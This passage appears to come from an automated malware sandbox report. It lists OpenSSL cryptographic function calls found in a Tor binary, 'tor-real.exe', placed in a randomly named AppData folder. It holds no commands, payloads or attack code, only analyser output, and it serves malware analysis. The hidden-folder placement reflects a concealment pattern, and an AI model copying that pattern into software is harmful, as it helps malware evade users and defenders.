                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ECC70 CMS_EncryptedData_decrypt,CMS_get0_type,OBJ_obj2nid,CMS_EncryptedData_set1_key,CMS_dataInit,BIO_pop,BIO_free,CMS_get0_content,ERR_put_error,ERR_put_error,BIO_free_all,25_2_6C1ECC70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C296CB0 CRYPTO_new_ex_data,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_free,CRYPTO_malloc,CRYPTO_THREAD_unlock,ERR_put_error,ERR_put_error,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,25_2_6C296CB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEC80 CRYPTO_zalloc,memcpy,CRYPTO_clear_free,CRYPTO_secure_zalloc,CRYPTO_secure_clear_free,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C1CEC80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E6C80 EVP_CIPHER_CTX_key_length,EVP_PKEY_derive,EVP_CipherInit_ex,OPENSSL_cleanse,CRYPTO_free,EVP_CIPHER_CTX_reset,EVP_PKEY_CTX_free,EVP_CipherUpdate,CRYPTO_malloc,EVP_CipherUpdate,OPENSSL_cleanse,OPENSSL_cleanse,__stack_chk_fail,CMS_RecipientInfo_kari_get0_alg,ERR_put_error,25_2_6C1E6C80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2ACC90 OPENSSL_hexstr2buf,strlen,CRYPTO_malloc,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,25_2_6C2ACC90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F4CA0 i2o_SCT,memcpy,CRYPTO_malloc,memcpy,ERR_put_error,CRYPTO_free,ERR_put_error,__stack_chk_fail,25_2_6C1F4CA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C30CCF0 UI_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,UI_get_default_method,CRYPTO_new_ex_data,UI_null,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_free,25_2_6C30CCF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C272CE0 CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C272CE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6CD1 CRYPTO_free,BIO_snprintf,CRYPTO_free,BN_free,25_2_6C1D6CD1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C202CF0 DH_meth_set1_name,CRYPTO_strdup,CRYPTO_free,ERR_put_error,25_2_6C202CF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ACCC3 CRYPTO_strndup,25_2_6C1ACCC3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18ACF9 CRYPTO_malloc,memcpy,CRYPTO_free,25_2_6C18ACF9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FACF0 DES_decrypt3,DES_encrypt2,DES_encrypt2,DES_encrypt2,25_2_6C1FACF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ACCE1 CRYPTO_strndup,CRYPTO_strndup,strlen,25_2_6C1ACCE1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1EAD00 CMS_SignerInfo_verify,OBJ_obj2nid,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestVerifyInit,ASN1_item_i2d,EVP_DigestUpdate,CRYPTO_free,EVP_DigestVerifyFinal,ERR_put_error,ERR_put_error,EVP_MD_CTX_reset,EVP_MD_CTX_new,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C1EAD00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4D34 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,25_2_6C1A4D34
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6D51 CRYPTO_free,BN_free,25_2_6C1D6D51
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E2D50 CMAC_resume,EVP_EncryptInit_ex,25_2_6C1E2D50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18ED43 CRYPTO_clear_free,CRYPTO_clear_free,25_2_6C18ED43
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4D47 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,25_2_6C1A4D47
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BAD6C CRYPTO_zalloc,BUF_MEM_new_ex,CRYPTO_zalloc,CRYPTO_free,BUF_MEM_free,CRYPTO_free,25_2_6C1BAD6C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2D0DA0 RAND_DRBG_get0_private,CRYPTO_THREAD_run_once,CRYPTO_THREAD_get_local,RAND_DRBG_instantiate,CRYPTO_THREAD_set_local,CRYPTO_THREAD_lock_free,CRYPTO_free_ex_data,CRYPTO_secure_clear_free,CRYPTO_clear_free,25_2_6C2D0DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAD80 CRYPTO_THREAD_get_local,DeleteFiber,OPENSSL_sk_pop,CRYPTO_free,DeleteFiber,CRYPTO_free,OPENSSL_sk_pop,OPENSSL_sk_free,CRYPTO_free,CRYPTO_THREAD_set_local,CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,25_2_6C1AAD80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18EDB8 CRYPTO_clear_free,CRYPTO_clear_free,ERR_put_error,25_2_6C18EDB8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0DBB CRYPTO_malloc,25_2_6C1D0DBB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C28AD90 EVP_DecryptUpdate,EVP_CIPHER_CTX_test_flags,ERR_put_error,ERR_put_error,memcpy,memcpy,EVP_CIPHER_flags,ERR_put_error,OPENSSL_die,EVP_DecryptFinal,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,OPENSSL_die,EVP_DecryptFinal_ex,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,OPENSSL_die,25_2_6C28AD90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C192DA0 ASN1_TIME_set_string_X509,strlen,ASN1_UTCTIME_check,ASN1_STRING_copy,CRYPTO_free,ASN1_GENERALIZEDTIME_check,CRYPTO_zalloc,memcpy,__stack_chk_fail,ASN1_TIME_to_tm,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_diff,time,OPENSSL_gmtime,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_print,BIO_printf,BIO_write,BIO_printf,__stack_chk_fail,ASN1_TIME_cmp_time_t,OPENSSL_gmtime,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_normalize,ASN1_STRING_set,time,OPENSSL_gmtime,ASN1_STRING_new,ASN1_STRING_set,BIO_snprintf,ASN1_STRING_set,ASN1_STRING_free,__stack_chk_fail,ASN1_TIME_compare,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TYPE_get,25_2_6C192DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B6DD0 ERR_put_error,BIO_clear_flags,BIO_clear_flags,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,__stack_chk_fail,ERR_put_error,25_2_6C1B6DD0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEDC0 CAST_ecb_encrypt,CAST_encrypt,25_2_6C1DEDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ECDC0 CMS_EncryptedData_encrypt,CMS_ContentInfo_new,CMS_EncryptedData_set1_key,CMS_dataInit,SMIME_crlf_copy,BIO_ctrl,CMS_dataFinal,BIO_free_all,CMS_set_detached,ERR_put_error,CMS_ContentInfo_free,ERR_put_error,ERR_put_error,BIO_free_all,25_2_6C1ECDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18EDF9 CRYPTO_clear_free,CRYPTO_clear_free,ERR_put_error,25_2_6C18EDF9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C28CDC0 EVP_PBE_CipherInit,OBJ_obj2nid,OPENSSL_sk_find,OPENSSL_sk_value,strlen,OBJ_nid2sn,EVP_get_cipherbyname,OBJ_nid2sn,EVP_get_digestbyname,OBJ_bsearch_,ERR_put_error,i2t_ASN1_OBJECT,ERR_add_error_data,OPENSSL_strlcpy,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_PBE_alg_add_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,ERR_put_error,OPENSSL_sk_new,25_2_6C28CDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AEDC0 OBJ_sn2nid,OPENSSL_LH_retrieve,strcmp,__stack_chk_fail,OBJ_txt2obj,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,OPENSSL_LH_retrieve,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C2AEDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BAE11 CRYPTO_free,25_2_6C1BAE11
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C270E30 ENGINE_pkey_asn1_find_str,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,25_2_6C270E30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19CE00 i2a_ASN1_STRING,BIO_write,BIO_write,BIO_write,__stack_chk_fail,a2i_ASN1_STRING,BIO_gets,OPENSSL_hexchar2int,OPENSSL_hexchar2int,ERR_put_error,CRYPTO_free,BIO_gets,CRYPTO_realloc,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C19CE00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BAE39 BUF_MEM_free,CRYPTO_free,25_2_6C1BAE39
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C6E30 BN_BLINDING_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_THREAD_get_current_id,BN_dup,BN_dup,BN_dup,BN_get_flags,BN_set_flags,BN_free,BN_free,BN_free,BN_free,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,25_2_6C1C6E30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C194E20 EVP_PKEY_asn1_add_alias,CRYPTO_zalloc,OPENSSL_sk_find,OPENSSL_sk_push,OPENSSL_sk_sort,25_2_6C194E20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FAE20 DES_ncbc_encrypt,DES_encrypt1,DES_encrypt1,DES_encrypt1,25_2_6C1FAE20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C190E40 ASN1_STRING_print_ex,ASN1_tag2str,strlen,BIO_write,__stack_chk_fail,ASN1_STRING_print_ex_fp,fwrite,fwrite,ASN1_tag2str,strlen,fwrite,fwrite,i2d_ASN1_TYPE,CRYPTO_malloc,i2d_ASN1_TYPE,fwrite,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,ASN1_STRING_to_UTF8,ASN1_mbstring_copy,__stack_chk_fail,25_2_6C190E40
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEE40 CAST_encrypt,25_2_6C1DEE40
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C190E74 BIO_write,BIO_write,BIO_write,BIO_write,i2d_ASN1_TYPE,CRYPTO_malloc,i2d_ASN1_TYPE,BIO_write,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C190E74
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C192E67 ASN1_STRING_copy,CRYPTO_free,CRYPTO_zalloc,memcpy,25_2_6C192E67
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAE90 ASYNC_cleanup_thread,OPENSSL_init_crypto,25_2_6C1AAE90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AEEA0 OBJ_txt2obj,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,__stack_chk_fail,OBJ_txt2nid,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,OBJ_obj2nid,ASN1_OBJECT_free,OPENSSL_LH_retrieve,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C2AEEA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19EEB0 ASN1_bn_print,BN_is_negative,BIO_indent,BN_is_zero,BN_num_bits,BIO_printf,BIO_printf,BN_num_bits,CRYPTO_malloc,BIO_printf,BN_bn2bin,ASN1_buf_print,CRYPTO_clear_free,25_2_6C19EEB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAED0 ASYNC_get_current_job,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,25_2_6C1AAED0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1EEEE0 OPENSSL_LH_retrieve,__stack_chk_fail,OPENSSL_sk_push,OPENSSL_LH_insert,OPENSSL_sk_delete_ptr,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C1EEEE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C30CF20 UI_free,OPENSSL_sk_pop_free,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C30CF20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4F04 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,25_2_6C1A4F04
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAF30 ASYNC_block_pause,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,25_2_6C1AAF30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4F5C OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,25_2_6C1A4F5C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C196F50 ASN1_STRING_copy,memcpy,strlen,CRYPTO_realloc,ERR_put_error,ERR_put_error,25_2_6C196F50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C296F60 CRYPTO_free_ex_data,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,CRYPTO_malloc,CRYPTO_THREAD_unlock,CRYPTO_THREAD_write_lock,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_free,ERR_put_error,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,25_2_6C296F60
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAF57 CRYPTO_THREAD_get_local,25_2_6C1AAF57
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C198F73 strlen,OPENSSL_sk_push,strlen,strlen,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,OPENSSL_sk_pop_free,25_2_6C198F73
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C30CFA0 UI_add_input_string,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C30CFA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C6F89 ERR_put_error,CRYPTO_free,25_2_6C1C6F89
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C286FB0 EVP_ENCODE_CTX_free,CRYPTO_free,25_2_6C286FB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAF80 ASYNC_unblock_pause,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,25_2_6C1AAF80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C286F80 EVP_ENCODE_CTX_new,CRYPTO_zalloc,25_2_6C286F80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AAF80 CRYPTO_ofb128_encrypt,25_2_6C2AAF80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAFA7 CRYPTO_THREAD_get_local,25_2_6C1AAFA7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C230FE0 EC_POINT_new,CRYPTO_zalloc,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,25_2_6C230FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29EFF0 CRYPTO_free,25_2_6C29EFF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E8FC0 CMS_add0_recipient_password,ERR_put_error,X509_ALGOR_new,EVP_CIPHER_CTX_new,EVP_EncryptInit_ex,EVP_CIPHER_CTX_iv_length,RAND_bytes,EVP_EncryptInit_ex,ASN1_TYPE_new,EVP_CIPHER_param_to_asn1,EVP_CIPHER_CTX_cipher,EVP_CIPHER_type,OBJ_nid2obj,EVP_CIPHER_CTX_free,ASN1_item_new,ASN1_item_new,X509_ALGOR_free,X509_ALGOR_new,OBJ_nid2obj,ASN1_TYPE_new,X509_ALGOR_it,ASN1_item_pack,X509_ALGOR_free,PKCS5_pbkdf2_set,strlen,OPENSSL_sk_push,ERR_put_error,EVP_CIPHER_CTX_free,ASN1_item_free,ERR_put_error,ERR_put_error,EVP_CIPHER_CTX_free,X509_ALGOR_free,ERR_put_error,ERR_put_error,EVP_CIPHER_CTX_free,__stack_chk_fail,25_2_6C1E8FC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C6FE0 BN_BLINDING_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C1C6FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E4FE0 CMS_RecipientInfo_decrypt,ERR_put_error,OBJ_obj2nid,AES_set_decrypt_key,CRYPTO_malloc,AES_unwrap_key,OPENSSL_cleanse,EVP_PKEY_CTX_new,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_free,CRYPTO_free,ERR_put_error,OBJ_obj2nid,OBJ_nid2sn,EVP_get_cipherbyname,EVP_CIPHER_key_length,EVP_PKEY_CTX_ctrl,EVP_PKEY_decrypt,CRYPTO_malloc,EVP_PKEY_decrypt,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,EVP_PKEY_CTX_free,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C1E4FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C182FE7 AES_decrypt,25_2_6C182FE7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B281B CRYPTO_free,25_2_6C1B281B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304820 CRYPTO_THREAD_lock_new,CRYPTO_zalloc,InitializeCriticalSectionAndSpinCount,CRYPTO_free,25_2_6C304820
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4808 ASN1_item_ex_i2d,CRYPTO_malloc,ASN1_item_ex_i2d,25_2_6C1A4808
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AA834 ERR_put_error,CRYPTO_free,25_2_6C1AA834
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F8830 DES_cfb64_encrypt,DES_encrypt1,DES_encrypt1,__stack_chk_fail,DES_cfb_encrypt,DES_encrypt1,DES_encrypt1,__stack_chk_fail,25_2_6C1F8830
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E828 ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,CRYPTO_malloc,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestInit_ex,EVP_DigestUpdate,ERR_put_error,EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,25_2_6C18E828
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C194856 CRYPTO_clear_free,EVP_MD_CTX_free,ERR_put_error,25_2_6C194856
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E879 EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,EVP_SignFinal,CRYPTO_free,25_2_6C18E879
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C32A840 OPENSSL_sk_free,OPENSSL_sk_pop_free,X509_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,X509_policy_tree_free,25_2_6C32A840
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B2868 CRYPTO_zalloc,ERR_put_error,25_2_6C1B2868
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0860 BN_GENCB_free,CRYPTO_free,25_2_6C1D0860
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3048B0 CRYPTO_THREAD_write_lock,EnterCriticalSection,25_2_6C3048B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C198890 CRYPTO_strdup,CRYPTO_strdup,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C198890
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AA890 ASYNC_start_job,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,CRYPTO_THREAD_get_local,OPENSSL_sk_pop,CRYPTO_malloc,memcpy,SwitchToFiber,SwitchToFiber,CRYPTO_malloc,CRYPTO_THREAD_set_local,CRYPTO_free,ASYNC_init_thread,CRYPTO_THREAD_get_local,CRYPTO_zalloc,ERR_put_error,CreateFiber,CRYPTO_free,DeleteFiber,CRYPTO_free,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,ERR_put_error,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,25_2_6C1AA890
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AE8B0 OBJ_obj2txt,BN_set_word,BN_lshift,BN_free,BN_add_word,BIO_snprintf,strlen,BN_new,OBJ_obj2nid,BN_bn2dec,strlen,OPENSSL_strlcpy,CRYPTO_free,OBJ_nid2ln,OPENSSL_strlcpy,strlen,OPENSSL_strlcpy,OBJ_nid2sn,BN_sub_word,BN_free,__stack_chk_fail,25_2_6C2AE8B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F4880 o2i_SCT,SCT_new,CRYPTO_memdup,SCT_free,ERR_put_error,SCT_free,CRYPTO_memdup,CRYPTO_memdup,ERR_put_error,SCT_free,__stack_chk_fail,25_2_6C1F4880
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304890 CRYPTO_THREAD_read_lock,EnterCriticalSection,25_2_6C304890
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1948B3 CRYPTO_clear_free,EVP_MD_CTX_free,ERR_put_error,25_2_6C1948B3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3048F0 CRYPTO_THREAD_lock_free,DeleteCriticalSection,CRYPTO_free,25_2_6C3048F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AA8C3 CRYPTO_THREAD_get_local,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,25_2_6C1AA8C3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D68C0 BN_bn2hex,BN_is_zero,CRYPTO_malloc,CRYPTO_strdup,ERR_put_error,25_2_6C1D68C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3048D0 CRYPTO_THREAD_unlock,LeaveCriticalSection,25_2_6C3048D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18A8F0 ASN1_STRING_set,ASN1_INTEGER_new,ASN1_STRING_set,ERR_put_error,ASN1_INTEGER_free,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,d2i_ASN1_UINTEGER,ASN1_get_object,ERR_put_error,ASN1_INTEGER_free,ASN1_INTEGER_new,ASN1_get_object,ERR_put_error,ERR_put_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,ASN1_INTEGER_get_int64,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C18A8F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F28F0 CONF_get1_default_config_file,CRYPTO_strdup,X509_get_default_cert_area,strlen,CRYPTO_malloc,X509_get_default_cert_area,BIO_snprintf,25_2_6C1F28F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304930 CRYPTO_THREAD_run_once,25_2_6C304930
